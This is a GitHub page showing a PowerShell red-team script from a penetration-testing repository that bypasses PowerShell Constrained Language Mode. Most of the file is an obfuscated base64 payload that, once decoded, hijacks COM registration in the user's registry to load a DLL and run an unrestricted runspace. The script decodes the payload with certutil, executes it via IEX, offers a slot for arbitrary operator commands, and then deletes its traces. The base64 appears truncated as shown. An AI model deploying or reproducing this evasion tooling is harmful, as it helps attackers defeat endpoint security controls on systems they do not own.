mgeeky-Penetration-Testing-.../red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM-Mini.ps1

18 lines
389 KiB
PowerShell
Raw Permalink Normal View History

2019-06-21 04:52:38 +02:00
$foo = "IyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiRjb21OYW1lID0gIkNsbURpc2FibGVEbGwiCiRjb21EZXNjcmlwdGlvbiA9ICJDTE0gRGlzYWJsZSBDT00iCgokZHN0RGxsUGF0aCA9ICIkKCRFbnY6VGVtcClcQ2xtRGlzYWJsZURsbC5kbGwiCiRkc3RBc3NlbWJseVBhdGggPSAiJCgkRW52OlRlbXApXENsbURpc2FibGVBc3NlbWJseS5kbGwiCgokZ3VpZCA9ICJ7Mzk0YWFhNTAtNjg0ZS00ODcwLTkxMWEtZDA0NTI5M2IzYjEzfSIKCiMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQoKZnVuY3Rpb24gQnlwYXNzLUNMTSAKeyAKICAgIHBhcmFtKAogICAgICAgW3N3aXRjaF0kUmVtb3ZlQ29tV2hlbkZpbmlzaGVkCiAgICApICAKCiAgICAkRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlNpbGVudGx5Q29udGludWUiCgogICAgZnVuY3Rpb24gQ3JlYXRlLUNPTSB7CiAgICAgICAgcGFyYW0oCiAgICAgICAgICAgIFtQYXJhbWV0ZXIoTWFuZGF0b3J5ID0gJHRydWUpXQogICAgICAgICAgICBbc3RyaW5nXSRjb21OYW1lLAoKICAgICAgICAgICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICAgICAgICAgIFtzdHJpbmddJGNvbURlc2NyaXB0aW9uLAoKICAgICAgICAgICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICAgICAgICAgIFtzdHJpbmddJGRsbFBhdGgsCgogICAgICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICR0cnVlKV0KICAgICAgICAgICAgW3N0cmluZ10kZ3VpZAogICAgICAgICkKICAgICAgICAKICAgICAgICAjIE9idGFpbnMgY3VycmVudCB1c2VyIFNJRCwgY2FuJ3QgdXNlIFN5c3RlbS5TZWN1cml0eS5QcmluY2lwYWwuTlRBY2NvdW50CiAgICAgICAgIyB0eXBlIGJlY2F1c2Ugd2UgYXJlIGluIENvbnN0cmFpbmVkIExhbmd1YWdlIE1vZGUKICAgICAgICAkc2lkID0gKHdob2FtaSAvdXNlciB8IHNlbGVjdC1zdHJpbmcgLVBhdHRlcm4gIihTLTEtNVswLTktXSspIiAtYWxsIHwgc2VsZWN0IC1FeHBhbmRQcm9wZXJ0eSBNYXRjaGVzKS52YWx1ZQoKICAgICAgICBOZXctUFNEcml2ZSAtUFNQcm92aWRlciBSZWdpc3RyeSAtTmFtZSBIS1UgLVJvb3QgSEtFWV9VU0VSUwogICAgICAgICRrZXkgPSAnSEtVOlx7MH1fY2xhc3NlcycgLWYgJHNpZAoKICAgICAgICAjIEFkZGluZyBvdXIgb3duIEluUHJvY1NlcnZlcjMyCiAgICAgICAgJGtleSA9ICdIS1U6XHswfV9jbGFzc2VzXENMU0lEXCcgLWYgJHNpZAogICAgICAgIE5ldy1JdGVtIC1QYXRoICRrZXkgLU5hbWUgJGd1aWQKICAgICAgICAka2V5ID0gJ0hLVTpcezB9X2NsYXNzZXNcQ0xTSURcezF9JyAtZiAkc2lkLCAkZ3VpZAogICAgICAgIE5ldy1JdGVtIC1QYXRoICRrZXkgLU5hbWUgJ0luUHJvY1NlcnZlcjMyJwogICAgICAgIE5ldy1JdGVtUHJvcGVydHkgLVBhdGggJGtleSAtTmFtZSAnKERlZmF1bHQpJyAtVmFsdWUgJGNvbURlc2NyaXB0aW9uIC1Qcm9wZXJ0eVR5cGUgU3RyaW5nIC1Gb3JjZQogICAgICAgICRrZXkgPSAnSEtVOlx7MH1fY2xhc3Nlc1xDTFNJRFx7MX1cSW5Qcm9jU2VydmVyMzInIC1mICRzaWQsICRndWlkCiAgICAgICAgTmV3LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAka2V5IC1OYW1lICcoRGVmYXVsdCknIC1WYWx1ZSAkZGxsUGF0aCAtUHJvcGVydHlUeXBlIFN0cmluZyAtRm9yY2UKICAgICAgICBOZXctSXRlbVByb3BlcnR5IC1QYXRoICRrZXkgLU5hbWUgJ1RocmVhZGluZ01vZGVsJyAtVmFsdWUgIkFwYXJ0bWVudCIgLVByb3BlcnR5VHlwZSBTdHJpbmcgLUZvcmNlCgogICAgICAgICMgUmVnaXN0ZXJpbmcgQ09NJ3MgUHJvZ0lEIC8gc2hvcnRuYW1lCiAgICAgICAgJGtleSA9ICdIS1U6XHswfV9jbGFzc2VzJyAtZiAkc2lkCiAgICAgICAgTmV3LUl0ZW0gLVBhdGggJGtleSAtTmFtZSAkY29tTmFtZQogICAgICAgICRrZXkgPSAnSEtVOlx7MH1fY2xhc3Nlc1x7MX0nIC1mICRzaWQsICRjb21OYW1lCiAgICAgICAgTmV3LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAka2V5IC1OYW1lICcoRGVmYXVsdCknIC1WYWx1ZSAkY29tRGVzY3JpcHRpb24gLVByb3BlcnR5VHlwZSBTdHJpbmcgLUZvcmNlCiAgICAgICAgTmV3LUl0ZW0gLVBhdGggJGtleSAtTmFtZSAnQ0xTSUQnCiAgICAgICAgJGtleSA9ICdIS1U6XHswfV9jbGFzc2VzXHsxfVxDTFNJRCcgLWYgJHNpZCwgJGNvbU5hbWUKICAgICAgICBOZXctSXRlbVByb3BlcnR5IC1QYXRoICRrZXkgLU5hbWUgJyhEZWZhdWx0KScgLVZhbHVlICRndWlkIC1Qcm9wZXJ0eVR5cGUgU3RyaW5nIC1Gb3JjZQogICAgfQoKICAgIGZ1bmN0aW9uIFJlbW92ZS1DT00gewogICAgICAgIHBhcmFtKAogICAgICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICR0cnVlKV0KICAgICAgICAgICAgW3N0cmluZ10kY29tTmFtZSwKCiAgICAgICAgICAgIFtQYXJhbWV0ZXIoTWFuZGF0b3J5ID0gJHRydWUpXQogICAgICAgICAgICBbc3RyaW5nXSRndWlkCiAgICAgICAgKQoKICAgICAgICAkc2lkID0gKHdob2FtaSAvdXNlciB8IHNlbGVjdC1zdHJpbmcgLVBhdHRlcm4gIihTLTEtNVswLTktXSspIiAtYWxsIHwgc2VsZWN0IC1FeHBhbmRQcm9wZXJ0eSBNYXRjaGVzKS52YWx1ZQoKICAgICAgICBOZXctUFNEcml2ZSAtUFNQcm92aWRlciBSZWdpc3RyeSAtTmFtZSBIS1UgLVJvb3QgSEtFWV9VU0VSUyB8IE91dC1OdWxsCiAgICAgICAgJGtleSA9ICdIS1U6XHswfV9jbGFzc2VzXHsxfScgLWYgJHNpZCwgJGNvbU5hbWUKICAgICAgICBSZW1vdmUtSXRlbSAtUGF0aCAka2V5IC1SZWN1cnNlIHwgT3V0LU51bGwKCiAgICAgICAgJGtleSA9ICdIS1U6XHswfV9jbGFzc2VzXENMU0lEXHsxfScgLWYgJHNpZCwgJGd1aWQKICAgICAgICBSZW1vdmUtSXRlbSAtUGF0aCAka2V5IC1SZWN1cnNlIHwgT3V0LU51bGwKICAgIH0KCiAgICBmdW5jdGlvbiBJbnZva2UtUFMgewogICAgICAgIHBhcmFtKAogICAgICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICR0cnVlKV0KICAgICAgICAgICAgW3N0cmluZ10kQ29tbWFuZHMKICAgICAgICApCgogICAgICAgICRSdW5zcGFjZSA9IFtydW5zcGFjZWZhY3RvcnldOjpDcmVhdGVSdW5zcGFjZSgpCiAgICAgICAgJHBvc2g
$t = New-TemporaryFile
$foo | Out-File $t.FullName
certutil -decode $t.FullName "$($t.FullName).ps1" | Out-Null
IEX "$($t.FullName).ps1"
###################
#
# Put your commands below:
#
###################
del "$($t.FullName)"
del "$($t.FullName).ps1"